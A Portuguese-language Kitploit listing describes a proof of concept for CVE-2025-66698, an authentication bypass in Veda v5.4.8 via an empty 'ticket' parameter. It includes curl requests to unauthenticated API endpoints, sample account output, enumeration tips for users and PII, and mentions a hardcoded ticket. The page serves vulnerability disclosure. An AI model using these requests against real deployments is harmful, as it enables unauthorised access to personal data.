Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-66698 — Prova de conceito para CVE-2025-66698: bypass de autenticação no Veda v5.4.8 através do parâmetro ticket vazio, permitindo enumeração de usuários, políticas e PII por meio de endpoints de API não autenticados. | Kitploit
Ferramentas/GitHubGitHub/perunchess/cve-2025-66698
ReconhecimentoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesAutenticação
GitHubperunchess/cve-2025-66698

CVE-2025-66698

Prova de conceito para CVE-2025-66698: bypass de autenticação no Veda v5.4.8 através do parâmetro ticket vazio, permitindo enumeração de usuários, políticas e PII por meio de endpoints de API não autenticados.

Ver Repositório
há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-66698

Software alvo: Veda (Semantic Machines) v5.4.8 (provavelmente todas as versões anteriores). Tipo de vulnerabilidade: Bypass de autenticação. ID CVE: CVE-2025-66698. Resumo: O sistema valida incorretamente o parâmetro ticket, tratando uma string vazia como uma sessão válida. Link do projeto: Veda (Semantic Machines)

18 de novembro de 2025: Descoberta e solicitação inicial de CVE. 9 de janeiro de 2026: ID CVE atribuído. Tentativa de contatar o fornecedor (ignorada e deletada). 13 de janeiro de 2026: Divulgação pública devido à falta de resposta do fornecedor.

Esta vulnerabilidade foi encontrada durante minha pesquisa de segurança ao revisar código. O parâmetro ticket no código não verifica valor vazio.

Alguns endpoints de API afetados:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (retorna 'true')

Existem muitos usuários padrão que você pode enumerar, também você pode alterar o esquema: cfg para v-s e etc. para enumerar usuários, políticas, PII (nomes completos, fotografias, cargos, datas de nascimento e informações de contato) etc.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

O que você faz é encontrar cada vez mais essas entidades "xxx:xxx" (cfg:xxx, v-s:xxx etc.). Você pode escrever um script bash simples para isso. Há também um systicket hardcoded para alcançar o mesmo resultado.

Avaliação CVSS:

  • Vetor CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Pontuação: 8.6 (Alta)
  • Vetor CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Pontuação: 9.3 (Crítica)
Baixar ferramenta